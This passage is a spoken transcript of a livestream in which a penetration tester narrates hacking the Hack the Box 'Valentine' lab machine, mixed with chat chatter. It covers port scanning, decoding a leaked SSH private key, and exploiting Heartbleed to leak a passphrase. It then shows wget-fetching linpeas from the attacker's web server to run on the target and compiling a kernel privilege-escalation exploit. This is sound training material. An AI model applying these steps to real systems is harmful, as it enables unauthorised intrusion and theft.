tester, also known as an ethical hacker, and I'm here to grow your hacking and cybersecurity knowledge. So for Valentine, this is a box that I have yet to hack. So we call this black box penetration testing, where I know very little about the machine. The only thing that I know about this machine is what you're seeing on the screen right here. I know it's a Linux box, and that's it. I don't know what kind of flavor of Linux it's running. I don't know what version of Linux it's running. And the part of hack the box when you're going through things for the first time is you don't know anything. You have to figure everything out yourself. And that's where the value of these streams come in, because I show you my process on how I hack boxes on Hack the Box and my hacking and penetration testing methodology. I will get stuck, I will get confused, but that's part of the process, and I bring you onto the journey to learn the process and see what it's like to actually hack a Hack the Box machine. So we got our IP address, the machine's already started. So the first thing I'm going to do is I'm going to do a port scan. I like to use RustScan because it's super fast. It actually uses nmap in the background, but this is way faster than a regular nmap. So the syntax is RustScan -A. A stands for address. We pasted our target IP address here. -R is range, and then we have 1 through 65,535, which is every single port. What's up, Wire Dog? How you doing, man? Thanks for stopping in. Be sure to like, comment, subscribe. Thank you, thank you. So as I said, RustScan, it is extremely fast. It's already done. So I like to run it twice because sometimes it's so fast it misses ports. And with RustScan, it's not built into Kali Linux by default. If you want to install it, you actually have to go to the GitHub. So it's github.com/rustscan/rustscan, and you can download it. The installation instructions are there. Just follow that and you can install it. Also, I didn't say this, I hardly ever say this on my streams, but it's very important to not run RustScan on a production network. This is really a tool that's only used for training and CTFs, which stands for capture flag. So I would not run RustScan on a production environment. I would stick with good old-fashioned nmap, because nmap is pretty graceful when it comes to not shutting down production servers. What's up, Wi-Fi addict? Welcome to the stream. Thanks for stopping in. Hey, I'm just curious, do you tackle the rooms prior to doing your walkthrough? No, I don't. So my first few streams back in the day, those were, let me just pull up my YouTube and I'll show you exactly what I'm talking about. That's a good question. I did say that this is a brand new box for me, but let me go to my YouTube channel and I'll show you what I mean. All right, so here is my YouTube channel, and pretty much anything like in the live section, this is all black box stuff. Like, I've never pwned these previously before I did these on stream, so these were all brand new to me when I did them. However, if you go to like my Hack the Box playlist here, this playlist here. So this playlist, so I would say, oh, that's the wrong playlist, sorry. Let me see if I can figure it out. It is this playlist. Alright, that's extremely loud. So anything that's in this playlist, this Hack the Box playlist here, so we can see here. Basically, like this one right here, inject, I did that one previously. That's why it's only an hour long, because I already knew how to solve it so I could get it done fast. So if it's like under an hour or just over an hour, you know I solved that previously. Except for the Hack the Box starting point. Hack the Box starting points, those are very easy machines. I did those black box as well. But for example, like Hack the Box Cerberus, that took me like a whole week to do, and then I did our stream redoing. And same thing with Agile. Basically these ones without my face, except for the starting point machines, I have pwned previously, but this is all brand new to me. What's up, Daniel? Thanks for stopping in. Glad to see you here. Thanks for stopping in. See you later. All right, so let's get back to the mission at hand. So the mission at hand here is poning this. So we have 3 ports open. We have 22, 80, and 443. I want to navigate to port 80 here. So to check out what's on port 80, all we have to do is supply the IP address. So we'll click this, copy our clipboard, and then we'll just apply the IP address and see what happens. So we get a website here. So we got connectivity to port 80, so that's really good. Let's do an nmap scan now. We're going to do a more in-depth and comprehensive nmap scan on the 3 ports that are open. So I'm going to get my notes here and grab my nmap scan command. It's this one here. So delete that. We need to get our IP address again. Get the IP address, paste that there. And then for ports, we have 22, 80, and 443. And then for this nmap scan, we're doing a full connection, also known as a TCP connection with the -ST. -A is a combination of -O, SV, and SC combined. It seems weird to do A and all 3 of these at the same time. However, I've actually gotten more results by also supplying these. A lot of people tell you don't have to supply these with the -A, but I'm telling you, I've actually gotten better results by also supplying these with -A. -A, like I said, just a combination of these 3, but -O is operating system detection, SV is service version detection, -SC is the scripting language that runs the most common scripts in the scripting language, and then -S script vuln is a vulnerability script, which is one of the scripts ran by -SC. -PN, we're skipping pings because we know the machine's already up, so we don't have to do that. And then -P is the port, so in this case it's 20, 22, 80, and 443, and then this is the target IP address. And then while that's running, I'm gonna run a good old Ferox buster. We're gonna fuzz. We're going to fuzz our web server here. So we're just gonna copy this, and we are going to place this here. So for Ferox buster, it's very similar to Dirbuster, GoBuster, Dirb, except Ferox buster it's a little different. It's not built into Cal by default. It's one of those tools you got to download separately, but I like it more than the other fuzzing tools. Mostly because it has recursive fuzzing. Vinicius, am I saying that right? Welcome to the stream. Thanks for stopping in. Glad to see you here. -W is the word list, so right now we're using the sec list ref large directories.txt. -C 401, 404, and 403 is just basically what I don't want to see. So anything that's a 401, 404, and 403, I don't want to see this. I don't want to see that in my output because it hogs it up. And I made a critical error. Let's do that again. I put http:// twice. We don't need to do that. So we will try that again and see what happens here. Our nmap results are back. That's really fast, so that was good. All right, so port 22, it's open SSH. It makes sense. Typically, that's not something you exploit in Hack the Box, so we're just going to ignore that for now. If we get desperate, we might check that out later. We got Apache HTTP D2.2.22, and we got some high severity CVs here. That's pretty common with Hack the Box machines, and that's typically not the path, but that's definitely something we can check out for sure. HTTP enum. So /dev, they're given that potentially interesting directory with listing, and then /index. potentially interesting folder. So that's interesting. That usually doesn't pop up in Nmap results. So let's do /dev and see what's over here. So that's pretty cool. We got two things. Let's go ahead and duplicate this tab, and we will do /index and see if there's anything here. There's not, without the /index/. Oh, you have to spell index correctly. Index. So there is a broken file image here. Index just takes you here. So we got notes.txt, so this could be some useful information. To do, coffee, research, fix decoder, encoder before going live. That seems interesting. Make sure encoding, decoding is only done client side. Okay, it's done server side now, so that's probably where our vulnerability is. Don't use a decoder, encoder until any of this is done. Find a better way to take notes. Yeah, that's a really bad way to take notes. All right, so this looks like there's some kind of encoder or decoder vulnerability here that we're taking advantage of. So that's cool. Let's go ahead and right click and view page source on the front here. We have nothing. It's just an image. Okay, nothing in the notes there. Encoder or decoder. Maybe there's something in the image that we might be able to decode, but let's keep scrolling down our Nmap results and see if there's anything interesting. All right. Nmap. We'll change that tab. See what's on our for rocks buster. We have directory listing at /dev. We already knew that. Well, we have this. Let's go back. We have the hype key. So this is some kind of key. So I'm actually just going to copy this. And I'm going to go to Cyberchef. Cyberchef is a very good place to encode and decode stuff. This looks like hex to me, but I'm just going to paste this in the input. And then for the output, we're just going to do detect. Is that one? Let's just put hex. It looks like hex to me. So we'll do from hex. There we go. Oh, look at that. We got a freaking private key, dude. That's amazing. Oh my gosh. It's too easy. This one's easy. All right. Well, let's get this private key. That's sick. Begin RSA private key. We just got to figure out the username for this now. Once we figure out a username for this, we can just SSH into the box. This could be the root private key, but I doubt it. But it's worth a shot. Alright, well that's cool. Let's make a directory here called hackthebox / what's the name of this machine? Valentine. Change directory, hackthebox, Valentine. And we will nano we'll just do nano private key. All right, so let's just try to log in as root maybe. SSH-I private key root at. We'll just see this word. I doubt it. Oh, I did not want to paste the whole private key. Yeah, it's IDRSA. I mean, you don't have to have the file extension. You're right, I do need to set the permissions. I do need to do that. Let's just hit the up. This is taking too long. Clear. Let's do let's move it to key dot RSA. No. Private key to ID RSA. And then we will chmod, what is it, 600? No, 400. 400 ID key to RSA. What's up, Julio? Welcome to the stream. Thanks for stopping in. Glad to see you here. Let's do SSH dash I key to RSA root at, grab our IP address here, copy that. See if that works. I doubt it. I don't think it's gonna let us go straight to root. I could be wrong though. That would be pretty easy. It would be too easy. This would be one of the easiest machines if this goes straight to root. I doubt it though. We gotta find a username somehow. In the meantime, while that's loading. So that was a private key, so let's go back here. We already got that. Notes. See view page sources or anything here? No, it's the same thing. Alright. No extra notes here. Close this. I don't see a username anywhere. That's what we need. Enter passphrase. There's a passphrase for it too. Alright, well, I don't know the passphrase. It's just root's password. Say nothing. Permission denied. I don't have any of that. Okay, we gotta get a username somehow. And maybe a password if there's a password that's tied to the key. But we got a key though. That's a huge deal. Let's go back over. Let's go back to Feroxbuster real quick. What's up, Lauren Miles? Welcome to the stream. Thanks for stopping in. How am I doing? I'm doing great. Thanks for asking. How about yourself? All good? It's good to hear. Oh, what did I just do? Why can't I? There we go. Feroxbuster -URL. Why did I forget my Feroxbuster command? Here we go. You can use SSH to John on a private key to convert it to a graphical format. Thank you for making me remember that. We still need to find a username for it though, and somewhere on the box. Grab our IP address again. We'll just keep doing some Feroxbuster here. But this time we're going to do large files. See if that gets us any different results. Enjoying streaming? Yeah, I love it. I've been looking forward to this all week, actually. Alright, let's see if we get anything interesting here. So, Vibe Snap, welcome to the stream. Thanks for stopping in. Glad to see you here. Index.php, that's probably just the home, right? Index.php. Yeah, same thing. Hey, I want to ask you that you haven't had anything on customize the channel yet. What do you mean by customize on a channel? To be honest with you, I don't really know how Kick works too well. I thought I customized it pretty well, but I mean, you might have to inform me what I'm missing out on because I don't know every feature there is about Kick. I was a Twitch streamer for a long time. So I'm very familiar with Twitch. Kick is like pretty much brand new to me. And then YouTube, but I know YouTube really well as well. Actually, to think you have your logo on panels, right? That's what I thought. I was like, man, I put everything that I saw there when I went through all the settings. I modified as much as I could. Where is this username, guys? Where do we think it is? Oh, OMG. Oh, that was the... Oh, there's encode PHP and decode PHP. Look at that. OMG.jpg, that's the file name. So we just got to go to encode and decode PHP. So let's try that out. We just get rid of this. Encode. Secure data encoder. No data is stored on our servers. Click here to use the decoder. Test. Your input test. Your encoded input. Alright, well, let's go to the encoder. Test. This is just a base 64 encoder. That's weird. What's the point of that? Let's grab this. Let's grab all the stuff that I put in CyberChef and just see what it spits back out at me here. So we don't want to encode, we want to decode. And we'll just paste all that in here. That didn't really help out much, did it? Can we like chat on Instagram or Discord? I do have a Discord. But let me grab the link for you. I gotta start putting the Discord in the channel information so you guys can just have it. I need to update that. To be honest with you, it's not in there because I didn't think people would be interested in joining my Discord. But there's actually a lot more people interested in the Discord than I thought there was going to be. So let me grab the link for you. Alright. Well, we found the encoder and decoder, but I don't know. I really don't know how it helps us. Because it's just a regular encoder decoder. Like, we already had the ability. No data. You know what? This might be. It says no data is stored on our servers. Well, let's put that to a test. Let's see if there's any SQL injection here. It didn't encode anything. Let's go to the encoder. Let's do a single quote. That looked like it might have worked. What if we did slash dot dot slash dot dot slash? We just need the username. Try decode. I would love to, and we'll share the portfolio there on your DM so we can check my work out as well. Okay, interesting. Let's pull up our good old friend Burp Sleep here. We are going to try to do some SQL injection here, guys, and see if SQL injection is the way. It's an easy box. I might be a little too advanced, but we will see what happens here. So we do a new project. I'll check it out for the stream. Were there any other interesting directories? No, just encode and decode so far. We can do this. Let me grab the other. let me grab a different word list here. But so far, no, there isn't a whole bunch of stuff. But let's try the medium.txt from Dirbuster. That's a little more comprehensive than either of the two. Nice talking to you as well. To you as well, Lauren. Look, there's notes.txt. There's a hype key. That's interesting. Oh, never mind. We already got that. We already checked the notes. So far, still nothing. I'm going to try to do some SQL injection here, guys. Let's up our burp here. Let's go to proxy. We will go to intercept. And we will do a test, submit. And we will go... I thought intercept was turned on. Oh, I know why. I know what happened here. Because we're not in the burp browser. Let's do open browser. Or not. Open browser. It's dead. It died. Let's navigate here. Forward that. And submit. No. What is going on? Secure data encoder. Well, we can close out of this one. Alright, let's do test again here and submit. This is going to get intercepted. So let's go ahead and send this to repeater. And let's just see if there's a SQL injection vulnerability here. I don't see anything there. Let's just use SQL map here, guys. Let's copy this. And let's file new. We haven't used SQL map on the stream yet. Let's do change directory, hack the box / Valentine. And then we will nano request.txt, paste our requests here. We're going to put an asterisk here because that's what we want to test. And then we want to do SQL map -r request. Yeah, that looks good to me. We don't know we don't know that, so we'll just run that and see what happens here. See if there's any SQL injection. You think the picture is a possible hint? It very well could be. It very well could be. That's what I was thinking too. That's what I was gonna try after that. After SQL injection doesn't work here, that's what I was gonna go for. We just need a username. But in the meantime, I mean, can we do like a slash ///? Actually, no, we don't want that one. Let's go here. Nothing. Well, that didn't help out. Alright. We did try that already, but it never hurts to try again. No data is stored on our servers. That's got to be a hint too, you know what I mean? The map vuln scan results. That could be a hint too, or like that could be a way forward, but I don't know. Those last few streams we spent so much time trying to exploit these Ubuntu servers, and it didn't bear fruit. I mean, it doesn't mean it's not going to this time, but I feel like I'm gonna keep looking around for a username first. I mean, we can. Does it say Heartbleed? Where does it say Heartbleed? Must have scrolled through this too fast. That would make sense. It's called Valentine. You're right. It's vulnerable to this man-in-mill attack. Vulnerable SSS poodle information attack. Oh, it does say Heartbleed. SSL Heartbleed. Heartbleed bug. Ah. Well. That's very interesting. You guys saw that. I missed that. I probably would have got that if I would have scrolled up and down again. But you guys got a keen eye. Good job. Let's do. Well, we don't want to do that. Well, let's. I think Heartbleed's going to be the win here. Where's my SQL map tab? I'm just going to close SQL map here. I don't think it's the way through anymore. I think Heartbleed is the way through. Like you said, Valentine's the name of the box. Let's close out of this too and close out of burp. And we'll keep burp in case we need it later. Let's look up Heartbleed exploit. I want to not do Metasploit. I guarantee there's a Metasploit module for it, but what's the CV number for this? Heartbleed, is there? Here we go. Copy selection. Let's do Searchbloit. Heartbleed. Memory disclosure. Let's do CV exploit. How to exploit Heartbleed bug. This is a Python script. Why am I... Dude, I hate DuckDuckGo so much. Like, the search results for DuckDuckGo is so bad. And it's so hard to... It's so hard to switch to Google for some reason. You know what I mean? With the Chromium and Linux. What's up, Mr. Hunter? Welcome to the stream. Thanks for stopping in. Glad to see you here. I don't see... Oh, here we go. Exploit DB. I hate DuckDuckGo. It's such a bad search engine, dude. It literally misses the most obvious searches. Like, why did XDB not pop up in when I searched for Heartbleed? So memory disclosure, quick and dirty demonstration. What's it do though? Memory disclosure. I don't know what that means. Mr. Hunter, did I welcome you to the stream already? I can't remember. I was so focused, but thanks for stopping in, Mr. Hunter. How long have I been doing this? This box? How long has this box been going on for? I think we're at 35 minutes right now. 36 now. But as far as cybersecurity, I have 6 years experience in the field. Penetration testing, I've been doing hacking, ethical hacking for probably 4 years, 3 years now or so. I think the first time I got on try hacking was like 3 years ago. All right, let's look at heartbleedbug.com. Stealing information protected under normal conditions. This compromises the secret keys used to identify the service providers and to encrypt the traffic. The names and passwords of the users of the actual content. This allows attackers to eavesdrop on communications, steal data directly from the service. How do I take advantage of it? What's up, M Stu? Welcome to the stream. Thanks for stopping in. Glad to see you here. Nice. I started self-learning a month ago. Nice. The important thing is to just keep at it, never stop. Just do a little bit every day, and you'll learn a lot over time. Well, let's just run this Python code, see what the heck happens, I guess. Python 2 dash. So what do we need? Exploit.py server and then -p for port. So the server is our IP address. Let's grab that. So let's go up arrow key, space server, and then -p and 443. Server is vulnerable. Okay, we know that it's vulnerable, but what did it just give me? I don't understand what just happened. It's all zeros. Go to Cyber Chef. That didn't help out at all. Receive heartbleed response. I don't know. Is this a password maybe? Like that's like all jumbled up maybe here? I don't know. That might be a password for the private key that I got. Yeah, that's it. It's just this, and then a bunch of zeros. This is all zeros. And then still all zeros. There was like one non-zero. There's one Q right here. And then the rest of this is all zeros still. So I don't know what this means. Let's run this again, see if we get the same. See if we get the same output. There's another Q. Scroll up. Yeah, I mean, it looks the same. I don't know what this means. We have. Let's watch. I don't think my VM would run YouTube. I don't know if I can watch a video. It's gonna be a blog right now. Let's see a heart bleed. Let's get this GitHub thing. See what's in here. Python heartbleed, connecting, handshake done, sending heartbeat request for. Oh, receive heartbeat response. Maybe I gotta supply. Maybe I gotta supply the HTTP. Maybe HTTPS:// No. Let's get rid of the S. Maybe. No. Well. Let's grab this guy's exploit. How do we run this? We run this by Python 2 heartbleed exploit.py and then the name of the website. I don't have it called heartbleed exploit. It's heart exploit 2.py https:// and then our IP address here. This might work. No module name, utils pyfancy, so pip install utils.pyfancy. Here's utils. Oh, there's pyfancy.py. Let's grab this whole thing here. Clear. Nano. No, not nano. Let's grab the utils and see what happens. Key.rsa. Okay. Let's see it. Gonna modify the script a little bit. It's saying from utils.py.fancy import. How do we? It did have some of the exploits in search play. You're right. We can try that here in a sec. utils is not a directory. Huh? Oh. Remove. You know what? Let's do search exploit part. And I forget how to -m. This is the same exact one we had earlier. So we do a dash. This is the same exploit we got from, oh yeah, from exploit DB, duh, because search exploit is exploit DB. Let's do search, let's grab the other heartbleed one, I guess. And then we will grab this one, see if it's any different. Overwrite. Oh. I meant to grab the other one. $64. So Python 232 64.py. It's the same thing. Ah! The same thing, dude. I don't understand what it's doing. Maybe it's not vulnerable to Heartbleed, or maybe it's not the way. Oh look, there's something here. Oh, what? Now we got more information here. Text equals. This is some text. Oh, there's a user on here, so we just gotta decode this. Text equals. So he encoded, or whoever the user was here, encoded this. So we just captured their whatever they encoded. So all we have to do, let's pull my notepad here and clean this up. So we just got to get rid of this and this. So it starts with do. So let's just decode this. Where's this decoder? Decoder, we'll paste whatever we just got here. Your input. Heartbleed, believe the hype. Is that the password? That might be the password, but that worked. So we ran it the first time and we got a bunch of nothing. But we ran it again and then we got it. So basically you have to run it while someone's supplying input to the server. So that's pretty cool. That's got to be a password, right? What's up, K Teach Tech? Welcome to the stream. Thanks for stopping in. How you doing today? So let's go Change directory, hack the box / Valentine. Let's move key.rsa to id_rsa. And then we will sh-i./id_rsa root at whatever this IP address is. Let's see if we got a password here. Where was his decode? Heartbleed. Heartbleed, believe the hype. Most definitely looks like a password. Yeah, I think so. It's like he almost knew that it's like if this is a real box, he's like, yeah, I know my server is vulnerable to Heartbleed. Let's make the password Heartbleed, believe the hype. Paste that. Sign in, no mutual signature supported. All right. Let's type that as the password and see if that gets us in. Permission denied. Well, let's make sure that I have this in my clipboard. Make sure I'm actually... Huh. Well, I'll be darned. We need to get... I think we just need a username now. Let's do Heartbleed again. Maybe he typed in his username in a different one. You know what I mean? So we got the AG. We got this part. But maybe the Heartbleed I ran right before that captured a username. You know what I'm saying? This is such a long output. That is the same thing. Well, let's just run Heartbleed again. See if we can get a username somewhere. I think it's the final piece of the puzzle we need for initial access. I don't know what this means. Is this... Let's try to build this up. So let's get rid of everything that's not a dot or a hex. And see if it makes anything interesting. Let's get rid of this line here. Let's get rid of this dot. Let's get rid of these dots. Let's get rid of these dots. Get rid of that dot. This looks like something. I don't know. This could be a password too. This could easily be a password. Nothing on this line. This is very strange. I don't know if this is gonna bear any fruit, but it's worth a shot, I guess. And get rid of both of these lines. So just an ampersand at the end here, so we can just do that and that. So I don't know. Is that a password? What was there a name for the key? No, we haven't got one. A name for the key. What's up? Sniping in style. We're gonna straighten things stopping in. What certs do I got? Whew, it's a long list. I got 13. Security Plus, Linux Plus, Network Plus, Pentest Plus, CYSA Plus, CCNA, Cisco Cyber Ops Associate, CEH, Certified Ethical Hacker, OSCP, CISSP, EJPT. Did I say Linux Plus? I don't know if I did or not. And then I have the OSWP, the OffSec Wireless Professional. I feel like I'm missing one. Did I say Linux Plus twice? I don't know. That's the most of them. It's at least 12. I might have said Linux Plus twice. You just got your first job in SOC after graduating university. So happy. Nice, congrats. It's a huge deal. It's hard to get a job straight out of university. So congrats for you. That's good stuff. He copy and pasted all my certs. Thanks, man. Yeah, that looks about right. What was I doing? Oh, let's run Heartbleed again. I don't know, man. We gotta get a username somewhere. There's a Q at the end of that. Text equals. So this is decode PHP. You know, what's this? We got a username. Let's see if we can find let's cat IDRSA. There's no username here. But we got a key. So that's pretty nice to have. And I think we have the password. We have the password too. We just don't have the username, guys. Let's go back to Ferox Buster. Decode, encode, indexed, notes, hype key, dev. Maybe dev is the username. What if that's the hype key? We already got the hype key though, right? The hype key, that's what we have. So this is what we decoded. I got this. I decoded it to what you see here. This is the hype key. Random one. I'm doing hack the box style on my target machine ain't online for some reason. Anyone know any quick fixes? Yeah, just click the revert button. And if you don't have VIP or VIP Plus, then you have to have multiple people hit the revert button. Unfortunately, hack the box machines break all the time, so it's pretty common to have to revert the machine. The name of the file itself. Do you think the name of the username is hype key? I mean, it's worth a shot. Well, let's enter the password for this. This has got to be some kind of password. What's up, Stone Man? Thanks for hopping in. Yeah, we can try it. It does say hype key, you know what I mean? Like if I was gonna make a user like a key, like I say my username is Kyser and Kyser underscore key would make sense. So maybe it is hype as a username. This server is so slow, by the way. Look how slow it is. Enter passphrase. Let me make sure I got this in my clipboard. Copy. Not working. Thanks for the support, Wire Dogs. I really appreciate you. He always be like, be sure to like, comment, subscribe. Wire Dog 6, the real MVP. Let's like and subscribe. Thanks, Stoneman. I appreciate you. Guys, who, the people in the chat right now, who would want to see notifications like for follow alerts and subscriber alerts? Because right now I don't have anything, but like if you want me to implement that, I can definitely implement that. It wouldn't take me that long at all. It'd take me a couple of hours after the stream, and I can have the next stream where like if someone subscribe, you get like your name flash across the screen with a alert or something. And then I also stream on Twitch too, so you would also see Twitch and YouTube notifications. Kick, I don't know. I stream Kick as well, but I don't know how to implement Kick notifications. Same thing with LinkedIn. If you're watching on LinkedIn, I don't know how to. I don't even think there's a way to implement LinkedIn notifications, but for Twitch and YouTube, 100% for sure. But I thought it would distract from the stream too much. But if you guys want that kind of thing, then we can absolutely do that. We gotta find a username. Bro, this hack the box is just not working. Which machine are you trying to load up? Is it an old one, a new one? What if it's view page source? What if it's OMG? Is the username, the name of the file for that picture? It's responder on the starting point. Yeah. Right, your key is right there where it says try-pn. Put the -pn, capital P lowercase n. You try that? It would definitely upgrade the stream. Alright, we'll give it a shot next stream then. Also, Writers Society, thanks for stopping in. Glad to see you here. What if the username's OMG? Let's try this. I just need a username. That's what I need. Enter passkey. Sign and see, it says no mutual signature supported, so I don't know what that means, man. Sign and send public, no mutual signature supported. Let's figure out what that means. That could be one of our problems right now. Add the lines at the beginning. Host, anybody. The base 64 encoded password? What do you mean? Like as the username? It might have. is meant to be read-only. Well, that makes sense, but I don't want to read-only. Does this matter? The one that was decoded. I'm not sure what you mean, Wire Dog. We can also try Valentine. That's the name of the box. That could easily be a username as well. Oh, it didn't give me that error again. Oh, no, maybe it will still. Hold on. We gotta type in the password. Type in the password did not work? No, it did not. So we're trying right now, but it didn't work. See? Permission denied. I think we're still just missing the username. There's /OMG. We didn't go there yet. We went to, there was OMG PNG, or JPEG, but we didn't went to, oh, that just takes me straight here. Let's view the page source on this, which I can't. It's literally just, there might be a hint in this picture. I don't know though. How do I extract metadata out of a picture? Extract metadata out of image. Kali Linux. I knew there was a tool for exiv. How do we use exiv? Exiv-h. Alright, well, let's see what happens here. H directory, home, Kali downloads. So we should have OMG something. Save images, OMG, JPEG. Why is that not popping up? There it is. Okay, let's do exiv to omg.jpg. No exif data found in the file. Okay, well, doesn't seem like anything's in the file. No data is stored on our servers. Click here to use the encoder. Maybe it's just... Let's try Python 2. We're gonna go back. Change directory / hackbox / Valentine. Oh. We have Heartbleed working successfully, but we're missing information from somewhere. See, we have this. URL encoded. Decode. I'm stuck. I don't know what else to try. I need a username. You think the error message is messing with it? You might be right. Let's see if there's a Metasploit module for this that works. You know what I mean? Raising up, welcome to the stream. Thanks for stopping in. How you doing today? Let's see if we can use the Metasploit model. Yeah, maybe there is messing with it. Maybe we're not getting the full information from the Heartbleed attack exploit, you know? Set our hosts to here. Let's run. Heartbleed response with leak. Scan 101 host. Execution complete. Is it loot? How do I... What? I'm doing good. Raising up. Thanks for asking. How did this work just now? Let's nano Etsy host. I'm proud to type in the IP address. It'd be easier if I can just type in Valentine instead of the IP address every time. Let's see if that works. Man, I thought this one was gonna be easy. As soon as we got that key, I was like, oh, it's a wrap, guys. This one's easy, you know? Enter passphrase. This has got to be the password. Like, this has to be the password. And we know the keys, right? Oh, that worked! Dude, we just was doing the SSH key wrong the whole time. Wardog, your command was the winner, dude. We just had to do the -o public key accepted algorithm equal plus SSH -RSA. That's all we had to do. We were missing this part right here. That's all we needed. We had everything right. Perfect. So, guys, the big lesson here is if you get that error, what error was it? I think this one right here. If you get this error right here, the no mutual signature supported, sign and send public key, no mutual signature supported. I did add this line. I don't know how much this affected it right here. I did add these lines to my file as well, but this unlocked it right here. So that's cool. That's cool. Cat user.txt. Flag difficulty. I'm gonna say that one was very easy. All right, next flag. We gotta figure out. Oh, I don't. Okay, let's do sudo -l. We gotta type in our password. We got the password, so oh, I typed in the password wrong. Oh no, this is the password to the key. This isn't the password to the user. Yeah, see, we don't know the password for the user. We know the password for the key, not the user. Interesting. All right. Well, let's do... Are we in the home? We're in the home, a pipe. Let's go to the desktop. There's another user.txt. There's two user.txts on this. It's the same thing. Yeah, it's the same thing. There's two copies of it for some reason. See if there's anything in documents. We're just looking at all the directories and see if there's anything here. Well, we can do ls-la/desktop. All right, let's go change directory /home. See if there's any other users on here. Just hype. Let's do cat. No, yeah, cat Etsy password. We got hype. We got. Okay, well, let's just run linpiece here. So we will change directory to my tools. And we will host a server. Before we do that, we have to do Apache, no, system CTL stop Apache 2, so I can run my other web server. I could run the web server Apache 2, but I like Python web servers. I think it's a lot easier to work with personally. And then we're just going to run linps. So we have to transfer linps over to the target machine, guys. So this is my tools directory. These are all the tools that I like to transfer to targets. You see I got linps right here. So what we need to do is, and we're hosting, so when I do python 3-m http.server80, we're essentially hosting all these files on a web server. And when we do that, we can transfer them to the target machine by doing a wget and then http:// my IP address, which is 10.10.16.30/ and then the tool, which is linps in this case. And if we do a permission denied, let's do change directory /tmp, and let's run that again. There we go. And if we do chmod +x linps, so this is going to make linps executable, and we do ./linps. Boom, linps is running. What's up, Kai? We're going to stream things stopping. Glad to see you here. Username Valentine? No, we are username Hype. So the host is Valentine, as you can see here. The host is Valentine, but not the username. I thought the username might have been Valentine. We could have tried that, but we didn't. But that probably would have been the next best guess, though, for sure. Linux version something generic, so we might be able to sudo version. That's really interesting. Okay. This one's yellow, so you know this is gonna work. Look at that. What is this written in? C? This is highly vulnerable. When it's yellow and red like that, highly vulnerable. So that's probably our best bet. Dirty Cow 2, we tried doing that last stream. That didn't get us anywhere, did it? But it probably would work in this case. TMUX. There's a TMUX session going on. Dev session. That's interesting. I've never seen TMUX like that run out of box before, but that could be the way in. If we can somehow take over the TMUX session. I've never done that before, but it makes sense to me that it's possible. What's up, Tech with Cody? When the stream thing's stopping in. Glad to see you here. Server name. Default SSO. None of these just popping out to me. Here's a private key right here. This is Hype's private key. This is the one we stole. This is the public key. Authorized keys. Hype at Hemorrhage. What? That's weird, huh? Right now we're looking to escalate our privileges from Hype to root, guys. So I'm just doing my enumeration right now for privilege escalation at the moment, if you're just tuning in. Also, before White Dog Sec beats me to it. If you're just now tuning in, make sure you hit the like, subscribe, follow the channel if you haven't already. And if you're new here, it's your first time here, I do streams every Thursday night and every Sunday. Thursday night at 7 p.m. Eastern Time. That's 4 p.m. Pacific Time. And I also do streams every Sunday, noon Eastern Time. And that is 9 a.m. Pacific Time. Once again, Sunday, noon Eastern Time, 9 a.m. Pacific Time. Thursdays, 7 p.m. Eastern Time, 4 p.m. Pacific Time on Thursdays. 2 streams per week. And if you miss any streams, they are all on YouTube. They are all on YouTube. If you go to my YouTube channel, youtube.com/Kyser Clark. I think, is it /Kyser Clark? Or is it... Do I not know my own URL? Hold on. Yeah, it's youtube.com/Kyser Clark. So the channel name is Kyser Clark Cybersecurity. You do not need to type in cybersecurity. It's just youtube.com/Kyser Clark. And if you go to the live section, you can watch every past broadcast that has ever happened. Job market crazy over here in Canada, trying to get into any cybersecurity position at the moment. Been in refinery for over 3+ years now, trying to make moves upward. Dude, that's amazing. I used to work in a refinery. I used to work in an oil refinery. I was a sandblaster painter. I removed asbestos and I removed lead paint inside of an oil refinery I did that for like 4 years and 9 months, almost 5 years. And I worked in chemical plants as well, and I worked on some pipelines as well. And the way I got into cybersecurity is I enlisted in the United States Air Force. And that's how I got out of the refinery. But yeah, I know what you mean. I know your struggle. I know what it's like to be in a refinery. It's not a fun place. It's dangerous. It's not fun. But good luck to you. I would say get some certifications. Start doing... Yeah, I would say start working on some certifications. Certifications have been the #1 thing that's up my career personally. Getting out of the military anyways. Getting into the military was basically... they took me with no experience. I'm going to try to do this, guys. I'm going to try to do this exploit here. Have my network plus sec plus CUSA. Wow. You're already off to a good start. The pentest wrote the pentest plus and studying for PMPT and OSCP. Once you get PMPT and OSCP, like you're going to get a lot of interviews. You're still going to get rejected. But I mean, I had OSCP and I have 13 certifications. At the time I was applying for my jobs, I had 12 certifications, and I still faced a lot of rejection. I got a lot of interviews though, but when you don't have years of experience, it's rough, very rough, unfortunately. Matter of fact, I have a YouTube video dropping tomorrow morning. If you're in America, it's tomorrow morning. If you're in a different time zone, you're in a different time zone. But yeah, tomorrow morning I have a video coming out called Top Cybersecurity Myths, and I talk about this pretty in depth, and I go on a little bit of a rant. So it's gonna be juicy information. Definitely want to check that out when it drops tomorrow. But I do mention how hard it is to find a job right now. And I rant for a while, but it's a good video. I really liked how it turned out. Let's try to exploit this, guys. We got this kernel exploit here. So in order to exploit this, we just need to let's change directory to hack the box Valentine And then if we do a nano exploit.c, paste that, and gcc exploit.c -o exploit. That didn't work. Okay, well, that's good to know. It would have been nice if they would. Oh no, GCC -02 -02. Oh, that's weird. Never seen that. Never seen a -02. Why did it say? Why did it tell me to do that? GCC -02. That doesn't work. We need to find an exploit for this. Maybe. This is a Python script? I mean, this is a Python script. Let's just try this. I think I pasted the wrong thing in here, so we'll remove that. Maybe I didn't. Alright, let's do Python 3 exploit.py. Python exploit.py. Python 3 is currently not installed. Gross. Also doing track me over the wire on Kali Linux VM. Nice. Did you get into a job after CYSA Plus? No. Or once you got OSCP and whatnot. I would say OSCP is when it started picking up for me. But my situation was vastly different than most people because I was coming out of the military, and I had 6 years of military cyber defense and system administration experience coming out of the military, so that really helped me out a lot. But I would say the OSCP was probably the #1 thing that got me the most pen testing interviews. It's easier to find blue team positions, in my opinion, than red team and pen testing positions. So like a SOC analyst, cybersecurity analyst, maybe even cybersecurity engineers. In my opinion, easier to get into than pen testing. Pen testing positions are a lot rarer and there's a lot more competition. Well, darn. Let's see if we can try to find a different exploit here. So I got the pseudo version here. There's a root exploit. This is the exploit.c. Is GCC on this box? Oh, GCC is on this box. That's really nice. I don't have to transfer it over. I don't have to compile it on my attack machine and transfer it over. So that's really nice. GCC exploit.c-o exploit. That worked fine. So let's do chmod plus x, make this exploit executable. And we will do /exploit and see what happens here. Memory corruption. Did I just break the whole box? I think it broke. I think we broke it. We broke it. We might have broke the entire box. Well, let's try this. Hype at Valentine. What? Do not resolve host name. Valentine. What did I do wrong there? Oh, I typed in SSH twice. That would do it. You can't type in SSH twice. What's it doing now? Oh, I 